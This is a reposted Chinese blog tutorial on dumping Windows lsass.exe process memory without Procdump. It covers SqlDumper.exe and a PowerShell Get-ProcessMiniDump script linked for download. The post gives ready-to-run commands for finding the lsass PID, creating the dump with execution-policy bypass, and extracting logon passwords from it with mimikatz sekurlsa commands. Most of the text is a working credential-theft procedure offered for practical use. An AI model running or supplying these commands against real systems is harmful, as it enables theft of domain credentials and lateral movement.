首页 > 其他 > 详细

关于代替Procdump dump lsass的两种方法

时间:2020-03-10 12:19:49      阅读:51      评论:0      收藏:0      [点我收藏+]

如果目标系统上安装了sql server ,SqlDumper.exe默认存放c:\ProgramFiles\Microsoft SQL Server\number\Shared,
number对应sqlserver版本
140 for SQL Server 2017
130 for SQL Server 2016
120 for SQL Server 2014
110 for SQL Server 2012
100 for SQL Server 2008
90 for SQL Server 2005
这里域环境为2008,故SqlDumper.exe在这个位置C:\Program Files\Microsoft SQL Server\100\Shared
技术分享图片

对比Procdump尺寸也小了许多

技术分享图片

技术分享图片

具体实战:
查看lsass.exe 的ProcessID
tasklist /svc |findstr lsass.exe
根据ProcessID来dump 内存文件,Full dump file执行成功后会生产SQLDmpr0001.mdmp文件
Sqldumper.exe ProcessID 0 0x01100
技术分享图片

mimikatz加载dump文件
sekurlsa::minidump SQLDmpr0001.mdmp
sekurlsa::logonPasswords full
技术分享图片

技术分享图片

 

地址https://mega.nz/#!9whTwbYR!1hx3IoIwNFcD9WubZcr0fYHGud0WR9QhpsS4tHsCCfw
Powershell版procdump
获得lsass.exe的进程ID
tasklist /svc |findstr lsass.exe
dump lsass.exe进程的内存文件
powershell -exec bypass "import-module .\Get-ProcessMiniDump.ps1;Get-ProcessMiniDump -ProcID 进程 -Path C:\windows\tasks\lsass.dmp"
技术分享图片

剩下的就是mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
技术分享图片

 

关于代替Procdump dump lsass的两种方法

原文:https://www.cnblogs.com/Yang34/p/12454856.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!